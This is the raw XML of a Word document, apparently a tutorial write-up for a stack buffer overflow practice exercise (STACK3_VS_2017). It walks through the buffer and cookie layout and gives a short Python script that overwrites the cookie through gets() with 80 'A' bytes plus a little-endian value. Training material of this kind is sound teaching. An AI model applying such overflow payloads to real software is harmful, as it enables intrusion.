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D203" w14:textId="12DB7FC5" w:rsidR="00377653" w:rsidRPr="00377653" w:rsidRDefault="00377653" w:rsidP="008C1DB1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In this third exercise </w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>STACK3_VS_2017</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">0x54 (84) bytes </w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are also reserved</w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>at the beginning of the function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B2EDB3" w14:textId="77777777" w:rsidR="007A5E0C" w:rsidRPr="00377653" w:rsidRDefault="007A5E0C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0855B2C3" w14:textId="77777777" w:rsidR="007A5E0C" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="014579A7" wp14:editId="6158A9D3">
            <wp:extent cx="2990850" cy="5810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7A84C" w14:textId="77777777" w:rsidR="007A5E0C" w:rsidRDefault="007A5E0C"/>
    <w:p w14:paraId="4FF8E7F3" w14:textId="77777777" w:rsidR="00377653" w:rsidRPr="00377653" w:rsidRDefault="00377653" w:rsidP="00BC1AC9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Again</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> there is a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MessageBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a Printf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3765A53B" w14:textId="77777777" w:rsidR="007A5E0C" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2177E7AC" wp14:editId="0FFF6C62">
            <wp:extent cx="5731200" cy="1206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A3D8" w14:textId="77777777" w:rsidR="007A5E0C" w:rsidRDefault="007A5E0C"/>
    <w:p w14:paraId="3E4994DD" w14:textId="4212DB13" w:rsidR="00377653" w:rsidRPr="00377653" w:rsidRDefault="00377653" w:rsidP="00F528C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We rename the variables to </w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E0A8D5" w14:textId="77777777" w:rsidR="00377653" w:rsidRPr="00377653" w:rsidRDefault="00377653" w:rsidP="00F528C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70B9BA8F" w14:textId="323F83A0" w:rsidR="00377653" w:rsidRPr="00377653" w:rsidRDefault="00377653" w:rsidP="00F528C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is passed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a pointer to the beginning of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">buffer </w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>variable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72949E98" w14:textId="77777777" w:rsidR="007A5E0C" w:rsidRPr="00377653" w:rsidRDefault="007A5E0C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9514D8" w14:textId="77777777" w:rsidR="007A5E0C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4ED963C" wp14:editId="39A96333">
            <wp:extent cx="3771900" cy="609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D8466" w14:textId="77777777" w:rsidR="007A5E0C" w:rsidRDefault="007A5E0C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="633B3A81" w14:textId="77777777" w:rsidR="00377653" w:rsidRPr="00377653" w:rsidRDefault="00377653" w:rsidP="008C3543">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>So far everything is the same as the previous exercises. The only thing that changes is the value of the comparison.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDD2668" w14:textId="65503E41" w:rsidR="007A5E0C" w:rsidRPr="00377653" w:rsidRDefault="007A5E0C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B172619" w14:textId="77777777" w:rsidR="007A5E0C" w:rsidRPr="00377653" w:rsidRDefault="007A5E0C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05D5700D" w14:textId="77777777" w:rsidR="007A5E0C" w:rsidRPr="00377653" w:rsidRDefault="007A5E0C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68384809" w14:textId="77777777" w:rsidR="007A5E0C" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="324F687B" wp14:editId="2B67FF11">
            <wp:extent cx="5731200" cy="3352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06CA4" w14:textId="77777777" w:rsidR="007A5E0C" w:rsidRDefault="007A5E0C"/>
    <w:p w14:paraId="6CDC0DA4" w14:textId="77777777" w:rsidR="00377653" w:rsidRPr="00377653" w:rsidRDefault="00377653" w:rsidP="00D909BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is now compared </w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">against </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x1020005</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="51044A3B" w14:textId="77777777" w:rsidR="00377653" w:rsidRPr="00377653" w:rsidRDefault="00377653" w:rsidP="00D909BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA0AACD" w14:textId="77777777" w:rsidR="00377653" w:rsidRPr="00377653" w:rsidRDefault="00377653" w:rsidP="00D909BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">little endian </w:t>
      </w:r>
      <w:r w:rsidRPr="00377653">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that would be seen as 0x05 0x00 0x02 0x01 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFBD0E7" w14:textId="77777777" w:rsidR="007A5E0C" w:rsidRPr="00377653" w:rsidRDefault="007A5E0C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US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7A5E0C" w:rsidRPr="00377653" w14:paraId="6A8398C1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5898" w14:textId="77777777" w:rsidR="007A5E0C" w:rsidRPr="003776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377653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sys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77653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from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subprocess </w:t>
            </w:r>
            <w:r w:rsidRPr="00377653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import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Popen, PIPE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buffer = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00377653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b"A</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00377653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* </w:t>
            </w:r>
            <w:r w:rsidRPr="00377653">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D36363"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>80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 xml:space="preserve">cookie = </w:t>
            </w:r>
            <w:r w:rsidRPr="00377653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b"\x05\x00\x02\x01"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payload = buffer + cookie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 = Popen(</w:t>
            </w:r>
            <w:r w:rsidRPr="00377653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"STACK3_VS_2017.exe"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, stdin=PIPE)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77653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377653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"PID: %s"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% hex(p1.pid))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77653">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="FCC28C"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>print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 xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="00377653">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="A2FCA2"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"Enter para continuar"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t>)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p1.communicate(payload)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p1.wait()</w:t>
            </w:r>
            <w:r w:rsidRPr="00377653">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="FFFFFF"/>
                <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t>input()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="558826A3" w14:textId="77777777" w:rsidR="007A5E0C" w:rsidRPr="00377653" w:rsidRDefault="007A5E0C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="633F2516" w14:textId="77777777" w:rsidR="007A5E0C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21B3EF9" wp14:editId="4A4BB11F">
            <wp:extent cx="3786188" cy="97779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977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EB016" w14:textId="77777777" w:rsidR="007A5E0C" w:rsidRDefault="007A5E0C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="007A5E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E0C"/>
    <w:rsid w:val="00377653"/>
    <w:rsid w:val="007A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A158"/>
  <w15:docId w15:val="{5316D15D-257B-4C7B-94E5-B34FF8CE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Kazimirow</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-24T17:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-24T17:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>